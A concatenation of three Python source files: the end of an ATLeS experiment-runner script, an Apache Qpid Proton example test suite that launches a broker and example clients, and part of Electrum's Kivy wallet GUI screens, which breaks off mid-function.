logging.info("stim=rand selected for phase %d; chose stimulus %s." % (phasenum, ("ENABLED" if dostim else "DISABLED")))
else:
logging.error("Invalid stim value %r for phase %d; expected 'on', 'off', or 'rand'.", stim, phasenum)
sys.exit(1)
phase_data = Phase(phasenum, length, dostim, background)
phases.append(phase_data)
section['phase_%d_length' % phasenum] = length
section['phase_%d_dostim' % phasenum] = dostim
section['phase_%d_background' % phasenum] = background
section['phases_data'] = phases
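# For example, args.phases == ["10,off,a.png", "30,rand,b.png"] yields two
# Phase entries: 10 minutes with the stimulus off on background a.png, then
# 30 minutes on b.png with the stimulus decided by a coin flip.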
def get_args():
'''Parse and return command-line arguments.'''
parser = argparse.ArgumentParser(description='ATLeS box experiment.')
parser.add_argument('id', type=str, nargs='?', default='',
help='experiment ID (optional), added to output filenames')
parser.add_argument('-w', '--watch', action='store_true',
help='create a window to see the camera view and tracking information')
parser.add_argument('--debug-frames', type=int, default=100, metavar='N',
help='save an image of the current frame every N frames - also saves a frame any time tracking is lost (default: 100; 0 means no debug frames will be written, including tracking-lost frames)')
parser.add_argument('--notes', type=str,
help='additional notes to be saved alongside the experiment data (optional)')
# exp_group = parser.add_argument_group('experiment settings')
# exp_group.add_argument('-t', '--time', type=int, default=None,
# help='limit the experiment to TIME minutes (default: run forever / until stopped with CTRL-C)')
# exp_group.add_argument('--time-from-trigger', action='store_true',
# help='when using -t/--time, only start counting the time from the moment the tracking first hits its trigger condition'),
# stimgroup = exp_group.add_mutually_exclusive_group(required=False)
# stimgroup.add_argument('--nostim', action='store_true',
# help='disable all stimulus for this run')
# stimgroup.add_argument('--randstim', action='store_true',
# help='choose whether to enable or disable stimulus for this run with 50/50 probabilities')
parser.add_argument('-p', '--phases', type=str, action='append',
help='configure phases of the experiment. '
'Each phase is specified as "len,stim,background", '
'where "len" is the phase length in minutes, '
'"stim" is one of '
'"on", "off", or "rand", controlling whether the '
'stimulus is on, off, or randomly enabled with '
'a 50%% chance, '
'and "background" is an image file to display on the monitor. '
'Specify each phase with its own -p/--phases '
'argument in the order the phases should run. '
'e.g.: "-p 10,off,a.png -p 30,rand,b.png -p 30,off,a.png" '
'If not specified, atles_box runs a single, '
'infinite "phase" with stim=True and a black background image.'
)
rare_group = parser.add_argument_group('rarely-used arguments')
rare_group.add_argument('--inifile', type=str, default='../ini/default.ini',
help="path to configuration file specifying physical setup (default: ../ini/default.ini)")
rare_group.add_argument('--vidfile', type=str,
help='read video input from the given file (for testing purposes)')
rare_group.add_argument('--delay', type=int, default=0,
help='delay in ms to add between frames (default: 0) -- useful for slowing video processing/display.')
return parser.parse_args()
def init_logging(args, conf):
'''Initialize the logging system. Uses argdir and id from args, adds 'trackfile' to conf
as a file object to which track data should be written.'''
# setup log files
filetimestamp = time.strftime("%Y%m%d-%H%M%S")
if args.id:
name = "%s-%s" % (filetimestamp, args.id)
else:
name = filetimestamp
conf['name'] = name
# ensure log and image directories exist
mkdir(config.TRACKDIR, config.REMOTE_USER)
debugframe_dir = "%s/%s" % (config.DBGFRAMEDIR, name)
# Make debugframedir world-writable so rsync can delete it.
oldmask = os.umask(0)
mkdir(debugframe_dir, config.REMOTE_USER)
os.umask(oldmask)
conf['debugframe_dir'] = debugframe_dir
trackfilename = "%s/%s-track.csv" % (config.TRACKDIR, name)
logfilename = "%s/%s.log" % (config.TRACKDIR, name)
# Setup the ROOT level logger to send to a log file and console both
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fh = logging.FileHandler(filename=logfilename)
fh.setFormatter(
logging.Formatter(fmt="%(asctime)s [%(levelname)s] %(message)s"))
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(fmt="[%(levelname)s] %(message)s"))
logger.addHandler(fh)
logger.addHandler(sh)
logging.info("Logging started.")
conf['trackfile'] = open(trackfilename, 'w')
def write_setup(conf):
# Record the setup in a -setup.txt file.
parser = RawConfigParser(dict_type=OrderedDict)
for section in conf:
if not isinstance(conf[section], dict):
# only record values stored in sections/dicts
continue
parser.add_section(section)
for key in sorted(conf[section]):
parser.set(section, key, conf[section][key])
setupfilename = "%s/%s-setup.txt" % (config.TRACKDIR, conf['name'])
with open(setupfilename, 'w') as setupfile:
# TODO: move to python3 and use shlex.quote() instead
cmdline = repr(' '.join(pipes.quote(s) for s in sys.argv))
setupfile.write("; Command line:\n; {}\n;\n".format(cmdline))
setupfile.write("; Configuration:\n")
parser.write(setupfile)
def sighandler(signum, frame):
if signum == signal.SIGALRM:
logging.info("Terminating experiment after timeout.")
sys.exit(0)
elif signum == signal.SIGINT:
logging.info("Caught ctrl-C; exiting.")
sys.exit(1)
elif signum == signal.SIGTERM:
logging.info("Caught SIGTERM; exiting.")
sys.exit(1)
else:
logging.warn("Unexpected signal received (%d); exiting." % signum)
sys.exit(1)
def main():
args = get_args()
conf = get_conf(args)
init_logging(args, conf)
if args.phases:
# add phases and runtime-decided config
setup_phases(args, conf)
total_time = sum(p.length for p in conf['phases']['phases_data'])
else:
# run as a single "infinite" phase with dostim=True
# and a black background image
conf['phases'] = {}
onephase = Phase(1, float('inf'), True, 'black.png')
conf['phases']['phases_data'] = [onephase]
total_time = None
# record all configuration to the setup file
write_setup(conf)
# catch SIGINT (ctrl-C) and SIGTERM
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
# setup lock file
try:
# O_CREAT | O_EXCL ensure that this call creates the file,
# raises OSError if file exists
lockfd = os.open(str(config.LOCKFILE), os.O_CREAT | os.O_EXCL | os.O_WRONLY)
lockfile = os.fdopen(lockfd, 'w')
# store PID, start time (in UTC), and experiment runtime
lockfile.write("%d\n%d\n%d\n" % (os.getpid(), int(time.time()), total_time*60 if total_time else 0))
lockfile.close()
# remove lockfile at exit
atexit.register(config.LOCKFILE.unlink)
except OSError:
logging.error("It appears an experiment is already running (%s exists). Please wait or end that experiment before starting another." % config.LOCKFILE)
sys.exit(1)
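# Note: O_CREAT | O_EXCL makes create-and-claim atomic, so even if several
# experiments start simultaneously, at most one can own the lockfile.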
# create Experiment object
exp = experiment.Experiment(conf, args)
# setup timeout alarm as a backup
# NOTE: not cross-platform (SIGALRM not available on Windows)
if total_time and sys.platform in ['cygwin', 'win32']:
logging.warning("SIGALRM not available under Windows. Backup timeout not enabled.")
elif total_time:
signal.signal(signal.SIGALRM, sighandler)
signal.alarm(total_time*60 + 60) # with 60 seconds buffer
# run in separate thread so signal handler is more reliable
runthread = threading.Thread(target=exp.run)
runthread.daemon = True # so thread is killed when main thread exits (e.g. in signal handler)
runthread.start()
if sys.version_info[0] >= 3:
runthread.join()
else:
# In Python 2, a timeout is required for join() to not just
# call a blocking C function (thus blocking the signal handler).
# However, infinity works.
runthread.join(float("inf"))
sys.exit(0)
if __name__ == '__main__':
main()
|
example_test.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
# This is a test script to run the examples and verify that they behave as expected.
import unittest
import os, sys, socket, time, re, inspect
from random import randrange
from subprocess import Popen, PIPE, STDOUT, call
from copy import copy
import platform
from os.path import dirname as dirname
from threading import Thread, Event
from string import Template
createdSASLDb = False
def findfileinpath(filename, searchpath):
"""Find filename in the searchpath
return absolute path to the file or None
"""
paths = searchpath.split(os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, filename)):
return os.path.abspath(os.path.join(path, filename))
return None
def _cyrusSetup(conf_dir):
"""Write out simple SASL config.
"""
saslpasswd = ""
if 'SASLPASSWD' in os.environ:
saslpasswd = os.environ['SASLPASSWD']
else:
saslpasswd = findfileinpath('saslpasswd2', os.getenv('PATH')) or ""
if os.path.exists(saslpasswd):
t = Template("""sasldb_path: ${db}
mech_list: EXTERNAL DIGEST-MD5 SCRAM-SHA-1 CRAM-MD5 PLAIN ANONYMOUS
""")
abs_conf_dir = os.path.abspath(conf_dir)
call(args=['rm','-rf',abs_conf_dir])
os.mkdir(abs_conf_dir)
db = os.path.join(abs_conf_dir,'proton.sasldb')
conf = os.path.join(abs_conf_dir,'proton-server.conf')
f = open(conf, 'w')
f.write(t.substitute(db=db))
f.close()
cmd_template = Template("echo password | ${saslpasswd} -c -p -f ${db} -u proton user")
cmd = cmd_template.substitute(db=db, saslpasswd=saslpasswd)
call(args=cmd, shell=True)
os.environ['PN_SASL_CONFIG_PATH'] = abs_conf_dir
global createdSASLDb
createdSASLDb = True
# Globally initialize Cyrus SASL configuration
#if SASL.extended():
_cyrusSetup('sasl_conf')
class Skipped(Exception):
# Not imported above; defined here so the raise below resolves.
pass
def ensureCanTestExtendedSASL():
# if not SASL.extended():
# raise Skipped('Extended SASL not supported')
if not createdSASLDb:
raise Skipped("Can't Test Extended SASL: Couldn't create auth db")
def pick_addr():
"""Pick a new host:port address."""
# TODO Conway 2015-07-14: need a safer way to pick ports.
p = randrange(10000, 20000)
return "127.0.0.1:%s" % p
class ProcError(Exception):
"""An exception that captures failed process output"""
def __init__(self, proc, what="non-0 exit"):
out = proc.out.strip()
if out:
out = "\nvvvvvvvvvvvvvvvv\n%s\n^^^^^^^^^^^^^^^^\n" % out
else:
out = ", no output)"
super(Exception, self, ).__init__(
"%s %s, code=%s%s" % (proc.args, what, proc.returncode, out))
class Proc(Popen):
"""A example process that stores its stdout and can scan it for a 'ready' pattern'"""
if "VALGRIND" in os.environ and os.environ["VALGRIND"]:
env_args = [os.environ["VALGRIND"], "--error-exitcode=42", "--quiet", "--leak-check=full"]
else:
env_args = []
def __init__(self, args, ready=None, timeout=30, skip_valgrind=False, **kwargs):
"""Start an example process"""
args = list(args)
if platform.system() == "Windows":
args[0] += ".exe"
self.timeout = timeout
self.args = args
self.out = ""
if not skip_valgrind:
args = self.env_args + args
try:
Popen.__init__(self, args, stdout=PIPE, stderr=STDOUT,
universal_newlines=True, **kwargs)
except Exception as e:
raise ProcError(self, str(e))
# Start reader thread.
self.pattern = ready
self.ready = Event()
# Help with Python 2.5, 2.6, 2.7 changes to Event.wait(), Event.is_set
self.ready_set = False
self.error = None
self.thread = Thread(target=self.run_)
self.thread.daemon = True
self.thread.start()
if self.pattern:
self.wait_ready()
def run_(self):
try:
while True:
l = self.stdout.readline()
if not l: break
self.out += l
if self.pattern is not None:
if re.search(self.pattern, l):
self.ready_set = True
self.ready.set()
if self.wait() != 0:
raise ProcError(self)
except Exception as e:
self.error = e
finally:
self.stdout.close()
self.ready_set = True
self.ready.set()
def safe_kill(self):
"""Kill and clean up zombie but don't wait forever. No exceptions."""
try:
self.kill()
self.thread.join(self.timeout)
except: pass
return self.out
def check_(self):
if self.error:
raise self.error
def wait_ready(self):
"""Wait for ready to appear in output"""
self.ready.wait(self.timeout)
if self.ready_set:
self.check_()
return self.out
else:
self.safe_kill()
raise ProcError(self, "timeout waiting for '%s'" % self.pattern)
def wait_exit(self):
"""Wait for process to exit, return output. Raise ProcError on failure."""
self.thread.join(self.timeout)
if self.poll() is not None:
self.check_()
return self.out
else:
raise ProcError(self, "timeout waiting for exit")
if hasattr(unittest.TestCase, 'setUpClass') and hasattr(unittest.TestCase, 'tearDownClass'):
TestCase = unittest.TestCase
else:
class TestCase(unittest.TestCase):
"""
Roughly provides setUpClass and tearDownClass functionality for older python
versions in our test scenarios. If subclasses override setUp or tearDown
they *must* call the superclass.
"""
def setUp(self):
if not hasattr(type(self), '_setup_class_count'):
type(self)._setup_class_count = len(
inspect.getmembers(
type(self),
predicate=lambda m: inspect.ismethod(m) and m.__name__.startswith('test_')))
type(self).setUpClass()
def tearDown(self):
self.assertTrue(self._setup_class_count > 0)
self._setup_class_count -= 1
if self._setup_class_count == 0:
type(self).tearDownClass()
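# Note: the countdown above assumes the runner invokes every test_* method of
# the class exactly once; a skipped test would leave tearDownClass uncalled.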
class ExampleTestCase(TestCase):
"""TestCase that manages started processes"""
def setUp(self):
super(ExampleTestCase, self).setUp()
self.procs = []
def tearDown(self):
for p in self.procs:
p.safe_kill()
super(ExampleTestCase, self).tearDown()
def proc(self, *args, **kwargs):
p = Proc(*args, **kwargs)
self.procs.append(p)
return p
class BrokerTestCase(ExampleTestCase):
"""
ExampleTest that starts a broker in setUpClass and kills it in tearDownClass.
Subclasses must set `broker_exe` class variable with the name of the broker executable.
"""
@classmethod
def setUpClass(cls):
cls.addr = pick_addr() + "/examples"
cls.broker = None # In case Proc throws, create the attribute.
cls.broker = Proc([cls.broker_exe, "-a", cls.addr], ready="listening")
cls.broker.wait_ready()
@classmethod
def tearDownClass(cls):
if cls.broker: cls.broker.safe_kill()
def tearDown(self):
b = type(self).broker
if b and b.poll() is not None: # Broker crashed
type(self).setUpClass() # Start another for the next test.
raise ProcError(b, "broker crash")
super(BrokerTestCase, self).tearDown()
CLIENT_EXPECT="""Twas brillig, and the slithy toves => TWAS BRILLIG, AND THE SLITHY TOVES
Did gire and gymble in the wabe. => DID GIRE AND GYMBLE IN THE WABE.
All mimsy were the borogroves, => ALL MIMSY WERE THE BOROGROVES,
And the mome raths outgrabe. => AND THE MOME RATHS OUTGRABE.
"""
def recv_expect(name, addr):
return "%s listening on %s\n%s" % (
name, addr, "".join(['{"sequence"=%s}\n' % (i+1) for i in range(100)]))
class ContainerExampleTest(BrokerTestCase):
"""Run the container examples, verify they behave as expected."""
broker_exe = "broker"
def test_helloworld(self):
self.assertEqual('Hello World!\n', self.proc(["helloworld", self.addr]).wait_exit())
def test_helloworld_direct(self):
self.assertEqual('Hello World!\n', self.proc(["helloworld_direct", pick_addr()]).wait_exit())
def test_simple_send_recv(self):
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), self.proc(["simple_recv", "-a", self.addr]).wait_exit())
def test_simple_recv_send(self):
# Start receiver first, then run sender"""
recv = self.proc(["simple_recv", "-a", self.addr])
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), recv.wait_exit())
def test_simple_send_direct_recv(self):
addr = pick_addr()
recv = self.proc(["direct_recv", "-a", addr], "listening")
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", addr]).wait_exit())
self.assertEqual(recv_expect("direct_recv", addr), recv.wait_exit())
def test_simple_recv_direct_send(self):
addr = pick_addr()
send = self.proc(["direct_send", "-a", addr], "listening")
self.assertEqual(recv_expect("simple_recv", addr),
self.proc(["simple_recv", "-a", addr]).wait_exit())
self.assertEqual(
"direct_send listening on %s\nall messages confirmed\n" % addr,
send.wait_exit())
def test_request_response(self):
server = self.proc(["server", "-a", self.addr], "connected")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", self.addr]).wait_exit())
def test_request_response_direct(self):
addr = pick_addr()
server = self.proc(["server_direct", "-a", addr+"/examples"], "listening")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", addr+"/examples"]).wait_exit())
def test_flow_control(self):
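# The expected text below must match the example's output byte-for-byte,
# including the "Exmaple 4" spelling if that is what the binary emits.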
want="""success: Example 1: simple credit
success: Example 2: basic drain
success: Example 3: drain without credit
success: Exmaple 4: high/low watermark
"""
self.assertEqual(want, self.proc(["flow_control", "--address", pick_addr(), "--quiet"]).wait_exit())
def test_encode_decode(self):
want="""
== Array, list and map of uniform type.
array<int>[int(1), int(2), int(3)]
[ 1 2 3 ]
list[int(1), int(2), int(3)]
[ 1 2 3 ]
map{string(one):int(1), string(two):int(2)}
{ one:1 two:2 }
map{string(z):int(3), string(a):int(4)}
[ z:3 a:4 ]
list[string(a), string(b), string(c)]
== List and map of mixed type values.
list[int(42), string(foo)]
[ 42 foo ]
map{int(4):string(four), string(five):int(5)}
{ 4:four five:5 }
== Insert with stream operators.
array<int>[int(1), int(2), int(3)]
list[int(42), boolean(0), symbol(x)]
map{string(k1):int(42), symbol(k2):boolean(0)}
"""
self.maxDiff = None
self.assertEqual(want, self.proc(["encode_decode"]).wait_exit())
def ssl_certs_dir(self):
"""Absolute path to the test SSL certificates"""
pn_root = dirname(dirname(dirname(sys.argv[0])))
return os.path.join(pn_root, "examples/cpp/ssl_certs")
def test_ssl(self):
# SSL without SASL, VERIFY_PEER_NAME
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir()], skip_valgrind=True).wait_exit()
expect = "Outgoing client connection connected via SSL. Server certificate identity CN=test_server\nHello World!"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_no_name(self):
# VERIFY_PEER
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir(), "-v", "noname"], skip_valgrind=True).wait_exit()
expect = "Outgoing client connection connected via SSL. Server certificate identity CN=test_server\nHello World!"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_bad_name(self):
# VERIFY_PEER
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir(), "-v", "fail"], skip_valgrind=True).wait_exit()
expect = "Expected failure of connection with wrong peer name"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_client_cert(self):
# SSL with SASL EXTERNAL
expect="""Inbound client certificate identity CN=test_client
Outgoing client connection connected via SSL. Server certificate identity CN=test_server
Hello World!
"""
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl_client_cert", addr, self.ssl_certs_dir()], skip_valgrind=True).wait_exit()
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_scheduled_send_03(self):
# Output should be a bunch of "send" lines but can't guarantee exactly how many.
out = self.proc(["scheduled_send_03", "-a", self.addr+"scheduled_send", "-t", "0.1", "-i", "0.001"]).wait_exit().split()
self.assertTrue(len(out) > 0)
self.assertEqual(["send"]*len(out), out)
def test_scheduled_send(self):
try:
out = self.proc(["scheduled_send", "-a", self.addr+"scheduled_send", "-t", "0.1", "-i", "0.001"]).wait_exit().split()
self.assertTrue(len(out) > 0)
self.assertEqual(["send"]*len(out), out)
except ProcError: # File not found, not a C++11 build.
pass
class EngineTestCase(BrokerTestCase):
"""Run selected clients to test a connction_engine broker."""
def test_helloworld(self):
self.assertEqual('Hello World!\n',
self.proc(["helloworld", self.addr]).wait_exit())
def test_simple_send_recv(self):
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), self.proc(["simple_recv", "-a", self.addr]).wait_exit())
def test_simple_recv_send(self):
# Start receiver first, then run sender"""
recv = self.proc(["simple_recv", "-a", self.addr])
self.assertEqual("all messages confirmed\n", self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), recv.wait_exit())
def test_simple_send_direct_recv(self):
addr = pick_addr()
recv = self.proc(["direct_recv", "-a", addr], "listening")
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", addr]).wait_exit())
self.assertEqual(recv_expect("direct_recv", addr), recv.wait_exit())
def test_simple_recv_direct_send(self):
addr = pick_addr()
send = self.proc(["direct_send", "-a", addr], "listening")
self.assertEqual(recv_expect("simple_recv", addr),
self.proc(["simple_recv", "-a", addr]).wait_exit())
self.assertEqual("direct_send listening on %s\nall messages confirmed\n" % addr,
send.wait_exit())
def test_request_response(self):
server = self.proc(["server", "-a", self.addr], "connected")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", self.addr]).wait_exit())
class MtBrokerTest(EngineTestCase):
broker_exe = "mt_broker"
if __name__ == "__main__":
unittest.main()
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum.bitcoin import TYPE_ADDRESS
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import TxOutput, Transaction, tx_from_str
from electrum.util import send_exception_to_crash_reporter, parse_URI, InvalidBitcoinURI
from electrum.util import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED, TxMinedInfo, get_request_status, pr_expiration_values
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
loaded = False
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def _change_action_view(self):
app = App.get_running_app()
action_bar = app.root.manager.current_screen.ids.action_bar
_action_view = self.action_view
if (not _action_view) or _action_view.parent:
return
action_bar.clear_widgets()
action_bar.add_widget(_action_view)
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
def update(self):
pass
@profiler
def load_screen(self):
self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
self.add_widget(self.screen)
self.loaded = True
self.update()
setattr(self.app, self.kvname + '_screen', self)
def on_activate(self):
if self.kvname and not self.loaded:
self.load_screen()
#Clock.schedule_once(lambda dt: self._change_action_view())
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
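# TX_ICONS is indexed by the integer status returned by
# wallet.get_tx_status() (see HistoryScreen.get_card below).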
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
txpos = tx_item['txpos']
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
txpos = tx_item['txpos_in_block'] or 0
height = tx_item['height']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
history = sorted(wallet.get_full_history(self.app.fx).values(), key=lambda x: x.get('timestamp') or float('inf'), reverse=True)
history_card = self.screen.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None
payment_request_queued = None
parsed_URI = None
def set_URI(self, text):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.screen.address = uri.get('address', '')
self.screen.message = uri.get('message', '')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.screen.is_lightning = False
def set_ln_invoice(self, invoice):
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.screen.address = invoice
self.screen.message = dict(lnaddr.tags).get('d', None)
self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.screen.is_lightning = True
def update(self):
if not self.loaded:
return
if self.app.wallet and self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
payments_container = self.screen.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list if item['status'] != PR_PAID]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
if invoice_type == PR_TYPE_LN:
key = item['rhash']
status = get_request_status(item) # convert to str
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
status = get_request_status(item) # convert to str
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.screen.amount = ''
self.screen.message = ''
self.screen.address = ''
self.payment_request = None
self.screen.locked = False
self.parsed_URI = None
def set_request(self, pr):
self.screen.address = pr.get_requestor()
amount = pr.get_amount()
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.screen.message = pr.get_memo()
self.screen.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
raw_tx = tx_from_str(data)
tx = Transaction(raw_tx)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
lower = data.lower()
if lower.startswith('lightning:ln'):
lower = lower[10:]
# try to decode as URI/address
if lower.startswith('ln'):
self.set_ln_invoice(lower)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.screen.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
return
if not self.screen.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.screen.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
return
message = self.screen.message
if self.screen.is_lightning:
return {
'type': PR_TYPE_LN,
'invoice': address,
'amount': amount,
'message': message,
}
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [TxOutput(TYPE_ADDRESS, address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_send_lightning(invoice['invoice'], invoice['amount'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs'] # type: List[TxOutput]
amount = sum(map(lambda x: x.value, outputs))
do_pay = lambda rbf: self._do_send_onchain(amount, message, outputs, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_send_lightning(self, invoice, amount):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice, amount, attempts)).start()
def _do_send_onchain(self, amount, message, outputs, rbf):
# make unsigned transaction
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins, outputs, None)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
